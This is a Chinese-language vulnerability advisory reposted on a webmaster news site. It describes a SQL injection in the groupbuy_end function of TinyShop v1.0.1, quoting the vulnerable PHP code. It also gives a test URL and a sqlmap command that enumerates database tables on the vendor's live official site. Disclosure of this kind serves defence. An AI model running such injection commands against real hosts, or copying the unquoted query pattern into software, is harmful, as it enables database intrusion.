TinyShop v1.0.1 SQL注射下载

TinyShop v1.0.1 SQL注入

/protected/controllers/ajax.php

//团购结束更新

	public function groupbuy_end(){

		$id = Req::args('id');

                //取得id

		if($id){

			$item = $this->model->table("groupbuy")->where("id=$id")->find();

                //无视GPC，直接带入查询

	        $end_diff = time()-strtotime($item['end_time']);

	        if($end_diff>0){

				$this->model->table("groupbuy")->where("id=$id")->data(array('is_end'=>1))->update();

			}

		}

		

	}

$id无单引号保护，因此无视GPC

何况官网没开GPC（框架里自动stripslashes先，开了也没用）

http://shop.tinyrise.com/ajax/groupbuy_end?id=4%27

C:\Users\Administrator>sqlmap.py -u "http://shop.tinyrise.com/ajax/groupbuy_end?id=4" -p id --tables --delay=12

风云小提示：

上一篇：迅雷白金会员账号7月13号下载

下一篇： [公开漏洞]墨迹天气android客户端系列1：某接口泄露用户手机号

当前位置：站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

TinyShop v1.0.1 SQL注射下载

TinyShop v1.0.1 SQL注入

推荐文章

推荐网站